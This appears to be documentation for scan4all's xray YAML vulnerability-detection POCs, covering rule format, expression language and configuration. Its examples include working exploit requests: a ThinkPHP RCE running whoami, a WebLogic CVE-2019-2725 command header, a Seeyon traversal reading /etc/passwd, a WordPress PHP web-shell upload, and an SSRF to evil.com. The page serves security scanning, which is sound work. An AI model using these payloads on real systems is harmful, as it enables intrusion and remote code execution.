Xray POCs - scan4all

Overview

scan4all integrates xray v2.0 POC system with 300+ YAML-based detection rules. These POCs are embedded in the binary and provide comprehensive web application vulnerability detection.

YAML POC System

The xray POC system uses YAML files to define vulnerability detection logic, making it easy to create and maintain detection rules.

300+ POCs

Comprehensive collection of YAML-based detection rules

Embedded

All POCs embedded in binary - no external files needed

Extensible

Easy to add custom YAML POCs

Fast Execution

Optimized YAML parser for rapid detection

YAML POC Structure

Basic Template

name: poc-yaml-weblogic-cve-2019-2725
manual: true
transport: http
rules:
    v100:
        request:
            cache: true
            method: POST
            path: /wls-wsat/CoordinatorPortType
            headers:
                Content-Type: text/xml
                cmd: whoami
            body: |
                <?xml version="1.0" encoding="utf-8" ?>
                <soapenv:Envelope 
                    xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
                    <soapenv:Header>
                        <work:WorkContext 
                            xmlns:work="http://bea.com/2004/06/soap/workarea/">
                            <!-- payload here -->
                        </work:WorkContext>
                    </soapenv:Header>
                </soapenv:Envelope>
        expression: |
            response.status == 200 && 
            response.body.bcontains(b"java.lang")

Key Components

Metadata

POC identification and configuration:

name: poc-yaml-target-vulnerability
manual: true          # Requires manual confirmation
transport: http       # Protocol: http, tcp, udp
set:
  rand1: randomInt(100000, 999999)
  rand2: randomLowercase(8)

Rules

Detection logic organized by version or variant:

rules:
    v100:  # Version or variant identifier
        request:
            # Request definition
        expression:
            # Detection expression
    v101:  # Alternative version
        request:
            # Different payload
        expression:
            # Different detection

Request

HTTP request configuration:

request:
    cache: true            # Cache response
    method: GET            # HTTP method
    path: /api/endpoint    # Target path
    headers:
        User-Agent: "scan4all"
        Authorization: "Bearer {{token}}"
    body: |
        {"key": "value"}
    follow_redirects: false

Expression

Detection logic using xray expression language:

expression: |
    response.status == 200 && 
    response.body.bcontains(b"vulnerable") &&
    response.headers["server"].contains("Apache")

Coverage by System

Web Frameworks
Middleware
OA Systems
CMS

Web Framework Vulnerabilities

Spring: Spring Cloud, Spring Boot exposure
ThinkPHP: Multiple RCE vulnerabilities
Struts2: OGNL injection, file upload
Laravel: Debug mode exposure
Django: Debug page information leak

Example: ThinkPHP RCE

name: thinkphp5023-method-rce
rules:
    v1:
        request:
            method: POST
            path: /index.php?s=captcha
            body: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
        expression: |
            response.status == 200 && 
            response.body.bcontains(b"uid=")

Middleware Vulnerabilities

Weblogic: CVE-2019-2725, CVE-2020-14882
Tomcat: CVE-2017-12615, CVE-2018-11759
JBoss: Deserialization RCE
Apache: Path traversal, config exposure
Nginx: Integer overflow, path traversal

Example: Weblogic SSRF

name: weblogic-ssrf
rules:
    v1:
        request:
            method: POST
            path: /uddiexplorer/SearchPublicRegistries.jsp
            body: operator=http://evil.com&rdoSearch=name&txtSearchname=test
        expression: |
            response.status == 200 &&
            response.body.bcontains(b"could not connect")

OA/Enterprise Systems

用友 (Yonyou): NC, GRP-U8 SQL injection
致远 (Seeyon): Multiple vulnerabilities
通达 (Tongda): File upload, SQL injection
泛微 (Weaver): Directory traversal, SQL injection
蓝凌 (Landray): File read, RCE

Example: Seeyon File Read

name: seeyon-cnvd-2020-62422-readfile
rules:
    v1:
        request:
            method: GET
            path: /seeyon/htmlofficeservlet
            headers:
                CREATEDATE: "../../../../../../etc/passwd"
        expression: |
            response.status == 200 &&
            response.body.bcontains(b"root:")

Content Management Systems

WordPress: Core and plugin vulnerabilities
Drupal: RCE, SQL injection
DedeCMS: Multiple vulnerabilities
MetInfo: SQL injection, file upload
ZCMS: Authentication bypass

Example: WordPress Plugin Upload

name: wordpress-ext-file-upload
rules:
    v1:
        request:
            method: POST
            path: /wp-admin/admin-ajax.php
            headers:
                Content-Type: multipart/form-data
            body: |
                --boundary
                Content-Disposition: form-data; name="file"; filename="shell.php"
                <?php system($_GET['cmd']); ?>
                --boundary--
        expression: |
            response.status == 200

Expression Language

Available Functions

Response Checks

# Status code
response.status == 200
response.status >= 200 && response.status < 300

# Body content
response.body.bcontains(b"text")
response.body.contains("string")
response.body.matches("regex.*pattern")

# Headers
response.headers["content-type"].contains("json")
response.headers["server"] == "Apache"

# Response time
response.latency > 5000  # milliseconds

String Functions

# String operations
string.contains(str, "substr")
string.startsWith(str, "prefix")
string.endsWith(str, "suffix")
string.toLowerCase(str)
string.toUpperCase(str)

# Regular expressions
regex.match(str, "pattern")
regex.find(str, "pattern")

Encoding Functions

# Base64
base64.encode("text")
base64.decode("dGV4dA==")

# URL encoding
url.encode("text with spaces")
url.decode("text%20with%20spaces")

# MD5/SHA
md5("text")
sha1("text")
sha256("text")

Random Generation

# Random values
randomInt(1000, 9999)
randomLowercase(8)      # random lowercase string
randomUppercase(8)      # random uppercase string
randomString(16)        # alphanumeric string

Multi-Step Detection

Workflow Example

name: multi-step-detection
rules:
    step1:
        request:
            method: GET
            path: /api/login
        expression: |
            response.status == 200
    
    step2:
        request:
            method: POST
            path: /api/login
            headers:
                Content-Type: application/json
            body: |
                {"user":"admin","pass":"admin"}
        expression: |
            response.status == 200 &&
            response.body.bcontains(b"token")
    
    step3:
        request:
            method: GET
            path: /api/admin/users
            headers:
                Authorization: "Bearer {{step2.response.json.token}}"
        expression: |
            response.status == 200 &&
            response.body.bcontains(b"admin_list")

Reverse Platform Integration

DNS/HTTP Callback Detection

name: ssrf-with-callback
set:
    reverse: newReverse()  # Create reverse platform instance
    randStr: randomLowercase(8)
rules:
    v1:
        request:
            method: GET
            path: /api/fetch?url=http://{{reverse.domain}}/{{randStr}}
        expression: |
            reverse.wait(5)  # Wait 5 seconds for callback

Reverse platform integration requires configuring ceyeapi and ceyedomain in config.

POC Organization

Directory Structure

pocs_yml/
├── ymlFiles/           # YAML POC files
│   ├── weblogic-*.yml
│   ├── spring-*.yml
│   ├── thinkphp-*.yml
│   └── ...
├── pkg/                # POC engine
│   ├── common/         # Common utilities
│   └── xray/           # Xray POC parser
├── check/              # POC execution
└── yml_poc_check.go    # Main entry point

Naming Convention

Fingerprint Prefix

Start with detected technology name: thinkphp-, weblogic-, spring-

Vulnerability ID

Include CVE or vulnerability identifier: cve-2019-2725, cnvd-2020-62422

Description

Add brief description: rce, sqli, file-read

Example: weblogic-cve-2019-2725-rce.yml

Execution Flow

Configuration

Basic Usage

# YAML POCs run automatically based on fingerprints
./scan4all -host target.com

Advanced Options

config/config.json

{
  "xrayPocs": {
    "enabled": true,
    "timeout": 5,
    "followRedirects": false,
    "maxRedirects": 3,
    "proxy": "",
    "ceyeApi": "your-api-key",
    "ceyeDomain": "your.ceye.io"
  }
}

Performance

Request Caching

Responses cached to avoid duplicate requests across POCs

Parallel Execution

Multiple POCs execute concurrently per target

Smart Loading

Only loads POCs matching detected fingerprints

Timeout Control

Configurable timeouts prevent hanging on slow targets

Output Format

http://target.com [200] [Weblogic] [exp-Weblogic|CVE_2019_2725] [http://target.com]

Components:

URL: Target address
Status: HTTP response code
Technology: Detected fingerprint
Vulnerability: POC name and CVE
Final URL: Post-redirect URL

Troubleshooting

No POCs Executing

Problem: YAML POCs not runningSolutions:

Ensure fingerprint detection is working
Check POC file naming follows convention
Verify YAML syntax is valid
Enable debug logging: ./scan4all -v -host target.com

False Positives

Problem: POC reports vulnerability incorrectlySolutions:

Review expression logic in YAML file
Add more specific detection criteria
Test against known vulnerable/safe targets
Check for response variations

Timeout Errors

Problem: POCs timing outSolutions:

Increase timeout in config
Check network connectivity
Reduce concurrent POC execution
Verify target is responsive

Best Practices

Specific Expressions

Use precise detection criteria to minimize false positives

Response Validation

Verify both status code and response content

Error Handling

Handle edge cases and connection failures gracefully

Documentation

Document POC purpose, affected versions, and references

Custom POCs

Learn to create custom YAML POCs

Go POCs

Explore native Go POC modules

Nuclei Templates

Nuclei template integration

Fingerprinting

Technology detection system

Get Started

Core Features

Usage Guide

Configuration

POC & Detection

​Overview

​YAML POC System

300+ POCs

Embedded

Extensible

Fast Execution

​YAML POC Structure

​Basic Template

​Key Components

​Coverage by System

​Web Framework Vulnerabilities

​Middleware Vulnerabilities

​OA/Enterprise Systems

​Content Management Systems

​Expression Language

​Available Functions

​Multi-Step Detection

​Workflow Example

​Reverse Platform Integration

​DNS/HTTP Callback Detection

​POC Organization

​Directory Structure

​Naming Convention

​Execution Flow

​Configuration

​Basic Usage

​Advanced Options

​Performance

Request Caching

Parallel Execution

Smart Loading

Timeout Control

​Output Format

​Troubleshooting

​Best Practices

Specific Expressions

Response Validation

Error Handling

Documentation

​Related Resources

Custom POCs

Go POCs

Nuclei Templates

Fingerprinting

Build docs developers (and LLMs) love

Overview

YAML POC System

YAML POC Structure

Basic Template

Key Components

Coverage by System

Web Framework Vulnerabilities

Middleware Vulnerabilities

OA/Enterprise Systems

Content Management Systems

Expression Language

Available Functions

Multi-Step Detection

Workflow Example

Reverse Platform Integration

DNS/HTTP Callback Detection

POC Organization

Directory Structure

Naming Convention

Execution Flow

Configuration

Basic Usage

Advanced Options

Performance

Output Format

Troubleshooting

Best Practices

Related Resources